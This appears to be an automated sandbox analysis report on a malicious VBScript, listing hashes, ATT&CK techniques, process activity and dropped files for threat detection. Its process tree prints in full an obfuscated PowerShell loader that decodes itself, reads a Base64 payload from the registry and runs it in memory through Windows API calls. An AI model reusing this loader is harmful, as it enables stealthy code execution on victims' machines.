e9a468674767f675c91f191535ecf92b1c3e26f892ea13f0faf6f60952460c44

General

Target

№ 106 - Supply of Flex.vbs
Size

558KB
MD5

fed4fab7721be9607d879c72178ba475
SHA1

9491ad9409f20a90767459e77264fcb2b8621617
SHA256

e9a468674767f675c91f191535ecf92b1c3e26f892ea13f0faf6f60952460c44
SHA512

29240a2b6989c4e3539805e842d96f57c8132ce9ffffe3076446eae573923261bc7365ca74432dd438b5c5b2685e47acce1126c2139832380b0231628e16d83e
SSDEEP

12288:ErXjb+WfItdE1se2/MhiIAKV5b/EQyUzszxbvZbOtYHb:YSMIHkwKLlIzxbRbgY7

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3628	powershell.exe
3628	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3628	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 3012 wrote to memory of 3628	3012	WScript.exe	77
PID 3012 wrote to memory of 3628	3012	WScript.exe	77
PID 3012 wrote to memory of 3628	3012	WScript.exe	77
PID 3628 wrote to memory of 3096	3628	powershell.exe	79
PID 3628 wrote to memory of 3096	3628	powershell.exe	79
PID 3628 wrote to memory of 3096	3628	powershell.exe	79
PID 3096 wrote to memory of 4692	3096	csc.exe	80
PID 3096 wrote to memory of 4692	3096	csc.exe	80
PID 3096 wrote to memory of 4692	3096	csc.exe	80

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\№ 106 - Supply of Flex.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3012
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Egnethederne = """StorkASigtedLevirdaucan-WestwTpaahnyUnidepFieldeRerol Cherr-CapelTFinanyPrepppAperteUnretDvitupeHomeofEtherivertynAnnekiPinoutHomogiRappeoPostbnLathe Bronz'FagiduUndersKompeiIvanhnPols gTaetb LappeSUdannyStylosLinnetAfdeleNonasmJentj;GrammuPetalsXenoliWeekenPaasegPrein Bib HSEgmonyChlorsSoundtLaurieSeparmRevol.UtvunRPanteuDovennChanstTacnoiAcquamNoncaeScutt.KumykIUhyggnSemisthouseelivstrCuriaoBandapdanneSGenneeForurrUnslovFllesiBlowjcHaandeSkindsUskyl;genmapstrobuHofnubRefrnlpaperiTornacGl Fo MonodsNotomtPrimeaGenertBndeliBltercJordl KonfecCarpalVetoeaNatiosJustisRappe WindsCUnfruomenobpStootyGlorrrBilfreRenovaTrikidAfkldeFrizerLeonh1Magne Opsky{heter[HenfaDSluknlForsklSynstISeducmmetaspHuberoFugt rTegnetKbman(Kofod`"""ThecouStrensForfaeBehndrForur3Unsor2Prero`"""Appre)Abstr]NrbilpSpadeuPrimobReaktlFeticiTibercsynax KonfisLnkontLogoraReoxitSwerviElectcPostt SalveeModerxSpeditArthreRealirTilstnAtomi StiltiAfternAnimatRewor ConveECaracnCausaudopchmLenarWChicqiMontmnCrustdParasoUnheawhypotSnachitBharaaVerdetUdkerilateeoAgendnUdfrisRiden(DatasiNedarnFoolhtExube VenstMBestteNrreplBaaseorummidLobst,TophoimicronSeguetKasba LovinJBjergaAfkalpNist 7curvi2Gland)Udbyt;Kateg[AlkalDCoedilSnefylcalmiILudedmBlodapenteroOrbicrDataktPetro(Frems`"""PosolwForreialternHeralsKlauspKontooreminoMugnelSgere.MyriodSttterSmndsvRepel`"""gring)Kontr]HostepStomouFedtebBesiglTrumfiFlbercRaekk FondssObjurtMockeaHjuletTekstiTubercProgr ForkfeGummixVarettRaimoePitchrTyrtanAntin hegliiCasitnAchectIngra ByggeAAntiadEntwidElboiPVurderUnneriSagebnBlacktGalaneSpaadrRekor(DisuniLserinFreektSkift SagvoSSagsgtspriniTerrolComputTriks1laste0Strut8Ejerl,PissoiAchomnUndsttThril ParabUDirekdAfhasssuverkTibernKompe,BadeoiPalisnFondatKonso LustePHjrterPicnioTransbUlykkoFedtesAreal)Exhib;Malto[SapraDBegynlKonfelthermIReagemStorepDtrenoStberrVandttSensa(pladr`"""PertukAnimeeOxyterDeturnBindeeSanctlDrapa3Tenon2sulfi`"""Rhizi)Ensor]VenstpArkoluSkiftbNonaplFolkeiTudehcUngoo AltabsMarietAirpoaSupertBenziiMagnecBrdde NitroeStandxAbacitAutoceflokirbnkednLedig AnsamiKropunBilabtorien BrugsCSigurrTegneeBorouaAflastNippieLandlCLmarkoMarrunModulsDresdoBorgelDisdaeCylinSHereacBurgjrUnsubeHerzeeFaxednDumpeBAnodeuCrowdfVillsfhovedeLysnerSerio(dangeiPolienNeedmtinter BelaaSPredekKriblaSlavesdefineScrut,BrugeiKrlignVareatBusse FraskGNiecerFllesirepasltoogtlGaudesHouse,LukkeiAktinnAmbrotStere SmitsefunctrSenneoOverigAccomecom g,HydraiUnrefnAnfaltBadev SuppeFJet OodriftrTurbolBrdbi,BgebriPinchnCrinktRdbru BrassBHomoseBorernPastr)Intel;Laysh[HowelDAfsallHypovlDovenIKrogsmSalvepPlatfoUgunsrSkamltHokus(Plang`"""GinnikCondoeSidebrCatalnVestieNonqulDaurn3Kitti2Fusio`"""Bluff)panti]InexppSkiljuSniglbUretalFunmaiSheencSteth IvorisPropetResteaInfiltInduliResetcMondn TiptieUnvagxLegiotWildeeForprrNonpanStrbs randoiUdlannOmslatskorp AntisPEugenrDunghoUbebycProsseNondesOutedshoved3Forta2SigtvFAlphaiForfirhannesAspirtUnpac(ReautiSamlenSimpltSnren HindbHRetfroStrikvGulvs,KohsiiUvensnBostrtAlfon ForskNsmgteaContitMesenuBakulrSheaf)Helis;Delpr[GalejDEruptlSitualSmeltITennemShillpBrikvoScriprTangetTorsk(Mouni`"""SmectwReseriFormrnsolitmaugitmChemi.DildedTranslSamarlBaske`"""Srtil)Dryop]MulctpBardeuMisthbResonlPrepsipromicSubte DepersVulkatvrdilaErrattApokriIodopcLast AabneeFrugtxWheretCotteeKvikkrStolpnOt Ba BasariUdjagnBaldetTolds TrikomRehumcUdfrliVarelGFamilegebrotplainCTeit rNonsaeBesoeaFemtetPreseoPieterFlummTSikheaCapsisSkrivkFlokm(notniiTegnsnOptegtRetsb RepresTriumoFrknevUnpol)Under;Sordi[OevriDBucarlPandelCaptuIGdninmFluobpLejevoSpororectastCreti(landb`"""JderskCostaeStickrLandsnbugvgeStipelHaan 3Ferti2Origi`"""Spoon)Paask]PaaklpRevoluIsflabBireflGrnseiHybricForsa BegavsVoldetUdgifaSolidtRecliiPaynicstats FreelePellaxUmbratMisfoeKafferNonwonattac GylliIButiknContatErhvePChurltSmaatrSlgte BotheEStrinnIndsuuSierrmExsolSFuroryPostesKnitrtKarriePrevomFodtuLDaggiofolkecMedsaaLystslleda eBemadsStue AHaven(UnoveuanticiOmmblnStorhtVelsm SignavBottl1Karre,Mans ikultunIagtttProds SdafgvKatte2Modst)Aser ;Ddeli[Cubs DGformlSubpllChon IFeminmMucifpDebutoSangsrNonditdigit(Philo`"""ClammkUdlydeUdsmirDenotnSkeleeIcopalEugub3Cigar2Forty`"""Cross)Toile]SubskpVorteuUnpiebKvadrlValkyiKjesecGlaci HaemosOptimtCamaraRastetEddaeiUnsilcManit SlaineShortxTombatSixtyeBraccrDrikknFroth TilflithynnnFems tFurbi UdnytVAfrmniRefrerSuasitMaaleuNedgaaKraftlDiletAAnsttlBegivlUnausoUncalcadels(VenewiPrissnSemantEroge FormavBrugb1Valgm,BalleiSuffrnVitiatOppor WoldsvRisti2Therm,MajoriAccusnCheestFremt Ytte vDamro3Fossu,KoloniPovlanBachetAabni ImpapvAfgan4Sises)Sulfo;Supra[SyncaDUnqualmillilBrdskIappeamDelirpImmoroUnderrCentrtIscre(Omvlt`"""NatalgfabeldDispeiVoksl3Volar2Harpe`"""Spise)Tingi]MarmopDar PuVagtsbPedaglStigmiPublicTsadi overksIrrectIntelaGlosstMaragiStorhcSeare DveskeGram xBelvetDischeConcerBrevfnPsych JgerkiDriftnTilketAnden WithaSTomleeDecoptMyselPMutinoAnegrlFedttyDaddeFForloiPharylCirculFjolsMPallaoParisdMoaneepippe(HofdaiStttenUnstotreadl OrgasPUnderhAplanlUnhobeSlbevgGarnnmThero,tbrudiIndhsnUnpertPeela EthveKgenneaAvenalUnseevUnispeDykkekProth)Samvi;Forur[SagfrDLeninllevitlsvagsIGrnthmAttinpIberiosharprIncastXiphi(Ejend`"""SponggLowlidSuperiUncom3Ekspa2Loppe`"""Pipel)Crena]HeurepbrunsuBasembRigellVod BiLimulcgenin FisnosAcutotRode aGatfitMusquiHypotcUdsky begaeeSmilexPresatLovmseTrianrIllapnKelte MerkaiZebubnGeddetPostc MonotPrailwaForhaiStromnWaybutVinduRMangegVowelnHarel(Fub FiExternRecontSmrka IndstDJenbriFejlepTestamNomad,PaakaitilfrnModehtKaval AbaclRInbeneSudsmshewin)Gearc;Rling}pewy 'Eksot;Desin`$DandyCEgalioPingppmiljbyLnsitrtestieOrdstaCantodFortreoversrGrass3Emeti=Nynaz[ChrisCMenthoAntevpAmbityGeninrElihueEathlaFarvadforgrePrgnarsopra1Trans]Retou:Trail:PifteVSekstiArmilrstvletBrushuDetacaForrelSidetAPrajelQuasqlOfftroRekapcMedre(polyu0Flerg,Brefr1Medle0Flske4Bambu8Brota5Quadr7Nonin6Villa,Petro1Sterp2Udvas2Photo8Hampe8Dekal,Mutar6Wooda4Nring)Konst;Indst`$LgeermMockgaSpoilgPachynSejerePartitMinidfTrilleSprinlIdioptKitto=Bredn(CentrGAcarieSelvhtSpiri-KartoIKompotElskoeEpiphmPalanPMargarHairmoFremmpLigfreAkslerTypegtbaaseyGenne Destr-LillaPEschaaSublitDatabhDekad Vrgel'TipplHraskhKSuperCSlutsUudriv:Tiddl\AnalySBlodkoMastifGastrtkalkmwHaandaSchwerReasseGradu\StridBMelanlplancoCarbiuUdlrtsnonreeAvengdSeedi'Nvnin)Torqu.NytteARoernmLngodoendagrBioloaDefkaldeltaiTilbatDelimeEkstetPostusUnreo;Opraa`$GreteGIrrepobjlkebBrandifebrunGarshiTyndvsPhlegmFejer Mesom=Disut Klipp[BeordSgenneyKnsrosUnslotbetoreLaanemSpont.AgrarCFasteoHstesnMiljsvRelayeFinthrafhortSemic]Straf:Semit:PowhaFMellerDiscuoElevsmcsiumBElselastorhsDetaceAthle6Appar4AgilaSmacrotRoseerCerebitilbanRingegAfhop(Grund`$PerspmSysteaGnistgRyatpnForbreEkspetThyrofdivideIndeflTohertPlade)antiq;Sassa[SejlbSMesovyAftalsKoliktBundfeApolomFlyvs.GenerRSkaaruSupplnBefortAnkefiShellmLegiseBiaxi.MelaiISamvinHandltsndereklovnrLevoloAfsttpSnotaSoverdePilotrBkkenvMisdeiKnackcNaveteIntersBrevi.skyttMTufstaMedicrAcrossFreemhDihydaStumtlStori]Acaci:Pooph:LubriCSloidoForompmeredySomme(canto`$StatsGTilkeoTubbabKalejiespirnPhymaiPrespsNedsimStifi,Overd Slebe0Ypper,Kitti Daril Marx `$ArgumCWindwospindpBenzoyCornrrVejrseDivisaDeclidVeleteSymforMolec3Aseet,Twang Adeno`$UpaakGPluskoMonurbBolteiElritnToughiArbejsSndermpalav.sanktcBekahoFanfauSlaugnLftestNedst)Palud;Aandl[resprCPorteoWernepForlnyFerierMummieLigamahydredSkraaeUnrecrFikse1Ludov]Singa:Konsu:PlecoEUnremnUforuuDyngemKizilSTrstpyFannisKannutUranieYnksomInstrLSuperoRaphacStillaAflaglVamseeKhanjsJerreAKatte(Osmes`$ProgrCemboroilmenpUnmasySprogrUdlggeDurkdaglansdPigeoeVizarrAgraf3graup,Whips simul0Necro)Fiske#Block;""";Function Copyreader4 { param([String]$HS); For($i=5; $i -lt $HS.Length-1; $i+=(5+1)){ $Lairdie = $Lairdie + $HS.Substring($i, 1); } $Lairdie;}$unspeciousness0 = Copyreader4 'TekstICalliEMusikXDanut ';$unspeciousness1= Copyreader4 $Egnethederne;& ($unspeciousness0) $unspeciousness1;;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3628
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ic4z0mb2\ic4z0mb2.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3096
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES253B.tmp" "c:\Users\Admin\AppData\Local\Temp\ic4z0mb2\CSC42C4E7345D1848C69B7232508B941E1E.TMP"
      4⤵
      PID:4692

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES253B.tmp

Filesize
1KB

MD5
e74fe922766bcad3d58962056c7e7ef7

SHA1
935c11eef2c089716bfab0680bc6b904b31ff308

SHA256
3598485b32d3087607f66835e280570cf2a61392ab545e4431f09705fc6fcc3c

SHA512
ea3a5753af736599c68881f8df02ccec71cbec02eb329a5398afd8b8acd8f82a87eee714e9a8c85c769e91da7f008220854449595198f50acbffd0271914bb23

Download Submit
C:\Users\Admin\AppData\Local\Temp\ic4z0mb2\ic4z0mb2.dll

Filesize
3KB

MD5
99abb850d4a38aca4f946a691429fa8e

SHA1
06af68e650108c18840acdaadb9949e2ed8ed18d

SHA256
62d96e86e9663ad6c46ea4d76fd8a884d6a9e6772ea44d6c29d606eabaa4c332

SHA512
86231a71fdacb665d6d49365a367f6b7ac5cd63728b5edfe1a129ed70ac8c89e716258c0f01ca39d855370c7e46670566a9ccea732fa7bb81bb0c208196baa4a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ic4z0mb2\CSC42C4E7345D1848C69B7232508B941E1E.TMP

Filesize
652B

MD5
41393bbaea7fdf13e4e982f275c2d522

SHA1
5dc8585816785e1e223d46e934c123e5409029ef

SHA256
32d249133f734713a77a6239b88d93a6cbe42e995b30d6b7aca75ac84ada8719

SHA512
74d58b891dd602384e0350d350c85841f1933ba73395a825f629e84eca45b7c5f615b3d50c782ebb85583055c001b3dc85db66e5ada65db0f3f893accafbf5f9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ic4z0mb2\ic4z0mb2.0.cs

Filesize
884B

MD5
4b82c4f3c1b5422465faba182ec69529

SHA1
6482b9bba3340751c97c038da6db324e9fa78562

SHA256
62ebfd4264d83376983b445fd1201eaf0095b2c4d46fed6ab401c3721398aeb1

SHA512
4b8e88f88630e97a6ca563326cc8672361a3916164a823324ed7fab865aa481569c65799e7d0d52d8884ae761cbc6fbc248f4c22746ea957ebae4fb2fe268143

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ic4z0mb2\ic4z0mb2.cmdline

Filesize
369B

MD5
280d3fbc4da846194f95a70e90f7373d

SHA1
13ec1bc4380854fa1baafce4fee7eb7f9e5c48f4

SHA256
0b2340dbf1ab0746a4f2db5af3753e717f6c084a61b0bcf31b1ff44aa72b35a9

SHA512
0da60e87dcaae2ddbf550d9592f79a1c3329d72aad84b104f839caae6b77b7111309084dfbee849c2f418fbe17c7984918c774228051cfb5624c945eb014e596

Download Submit
memory/3628-135-0x00000000051E0000-0x0000000005202000-memory.dmp

Filesize
136KB

Download
memory/3628-148-0x00000000075C0000-0x0000000007656000-memory.dmp

Filesize
600KB

Download
memory/3628-140-0x00000000067B0000-0x00000000067CA000-memory.dmp

Filesize
104KB

Download
memory/3628-138-0x0000000006240000-0x000000000625E000-memory.dmp

Filesize
120KB

Download
memory/3628-136-0x0000000005AD0000-0x0000000005B36000-memory.dmp

Filesize
408KB

Download
memory/3628-139-0x0000000007AA0000-0x000000000811A000-memory.dmp

Filesize
6.5MB

Download
memory/3628-134-0x0000000005270000-0x0000000005898000-memory.dmp

Filesize
6.2MB

Download
memory/3628-152-0x0000000007420000-0x0000000007A9A000-memory.dmp

Filesize
6.5MB

Download
memory/3628-133-0x0000000002890000-0x00000000028C6000-memory.dmp

Filesize
216KB

Download
memory/3628-137-0x0000000005BF0000-0x0000000005C56000-memory.dmp

Filesize
408KB

Download
memory/3628-149-0x0000000007520000-0x0000000007542000-memory.dmp

Filesize
136KB

Download
memory/3628-150-0x00000000086D0000-0x0000000008C74000-memory.dmp

Filesize
5.6MB

Download
memory/3628-151-0x0000000007420000-0x0000000007A9A000-memory.dmp

Filesize
6.5MB

Download

Analysis

Sharing